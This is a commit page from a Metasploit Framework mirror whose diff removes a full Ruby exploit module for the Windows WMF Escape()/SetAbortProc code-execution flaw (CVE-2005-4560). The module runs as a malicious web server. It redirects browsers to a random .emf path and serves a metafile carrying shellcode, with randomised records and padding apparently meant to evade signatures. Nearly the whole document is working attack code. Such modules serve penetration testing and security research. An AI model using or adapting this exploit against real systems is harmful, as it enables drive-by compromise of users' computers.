mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
rename, tweak
git-svn-id: file:///home/svn/incoming/trunk@3311 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
parent
8049b32cbc
commit
5550a72d1f
@ -1,185 +0,0 @@
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
|
||||
|
||||
#
|
||||
# This module acts as an HTTP server
|
||||
#
|
||||
include Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the GDI library included with
|
||||
Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
|
||||
to execute arbitrary code through the SetAbortProc procedure. This module
|
||||
generates a random WMF record stream for each request.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'hdm',
|
||||
'san <san@xfocus.org>',
|
||||
'O600KO78RUS@unknown.ru',
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['BID', '16074'],
|
||||
['CVE', '2005-4560'],
|
||||
['OSVDB', '21987'],
|
||||
['MIL', '111'],
|
||||
['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],
|
||||
['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
|
||||
['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000 + (rand(256).to_i * 4),
|
||||
'BadChars' => "\x00",
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-find',
|
||||
},
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP/2003/Vista Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 27 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check_dependencies
|
||||
use_gzip
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
|
||||
ext = 'emf'
|
||||
|
||||
if (not request.uri.match(/\.emf$/i))
|
||||
html =
|
||||
"<html><meta http-equiv='refresh' content='0;" +
|
||||
get_resource + '/' +
|
||||
Rex::Text.rand_text_alphanumeric(rand(256)+16) +
|
||||
".#{ext}'><body>One second please...</body></html>"
|
||||
send_response(cli, html)
|
||||
return
|
||||
end
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })
|
||||
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_metafile(payload)
|
||||
|
||||
# Minimal length values before and after the Escape record
|
||||
pre_mlen = 1440 + rand(8192)
|
||||
suf_mlen = 128 + rand(8192)
|
||||
|
||||
# Track the number of generated records
|
||||
fill = 0
|
||||
|
||||
# The prefix and suffix buffers
|
||||
pre_buff = ''
|
||||
suf_buff = ''
|
||||
|
||||
# Generate the prefix
|
||||
while (pre_buff.length < pre_mlen)
|
||||
pre_buff << generate_record()
|
||||
fill += 1
|
||||
end
|
||||
|
||||
# Generate the suffix
|
||||
while (suf_buff.length < suf_mlen)
|
||||
suf_buff << generate_record()
|
||||
fill += 1
|
||||
end
|
||||
|
||||
clen = 18 + 8 + 6 + payload.encoded.length + pre_buff.length + suf_buff.length
|
||||
data =
|
||||
#
|
||||
# WindowsMetaHeader
|
||||
#
|
||||
[
|
||||
# WORD FileType; /* Type of metafile (1=memory, 2=disk) */
|
||||
rand(2)+1,
|
||||
# WORD HeaderSize; /* Size of header in WORDS (always 9) */
|
||||
9,
|
||||
# WORD Version; /* Version of Microsoft Windows used */
|
||||
( rand(2).to_i == 1 ? 0x0300 : 0x0100 ),
|
||||
# DWORD FileSize; /* Total size of the metafile in WORDs */
|
||||
clen/2,
|
||||
# WORD NumOfObjects; /* Number of objects in the file */
|
||||
rand(0xffff),
|
||||
# DWORD MaxRecordSize; /* The size of largest record in WORDs */
|
||||
rand(0xffffffff),
|
||||
# WORD NumOfParams; /* Not Used (always 0) */
|
||||
rand(0xffff),
|
||||
].pack('vvvVvVv') +
|
||||
#
|
||||
# Filler data
|
||||
#
|
||||
pre_buff +
|
||||
#
|
||||
# StandardMetaRecord - Escape()
|
||||
#
|
||||
[
|
||||
# DWORD Size; /* Total size of the record in WORDs */
|
||||
4,
|
||||
# WORD Function; /* Function number (defined in WINDOWS.H) */
|
||||
(rand(256).to_i << 8) + 0x26,
|
||||
# WORD Parameters[]; /* Parameter values passed to function */
|
||||
9,
|
||||
].pack('Vvv') + payload.encoded +
|
||||
#
|
||||
# Filler data
|
||||
#
|
||||
suf_buff +
|
||||
#
|
||||
# Complete the stream
|
||||
#
|
||||
[3, 0].pack('Vv') +
|
||||
#
|
||||
# Some extra fun padding
|
||||
#
|
||||
Rex::Text.rand_text(rand(16384)+1024)
|
||||
|
||||
return data
|
||||
|
||||
end
|
||||
|
||||
def generate_record
|
||||
type = rand(3)
|
||||
|
||||
case type
|
||||
when 0
|
||||
# CreatePenIndirect
|
||||
return [8, 0x02fa].pack('Vv') + Rex::Text.rand_text(10)
|
||||
when 1
|
||||
# CreateBrushIndirect
|
||||
return [7, 0x02fc].pack('Vv') + Rex::Text.rand_text(8)
|
||||
else
|
||||
# Rectangle
|
||||
return [7, 0x041b].pack('Vv') + Rex::Text.rand_text(8)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
Loading…
Reference in New Issue
Block a user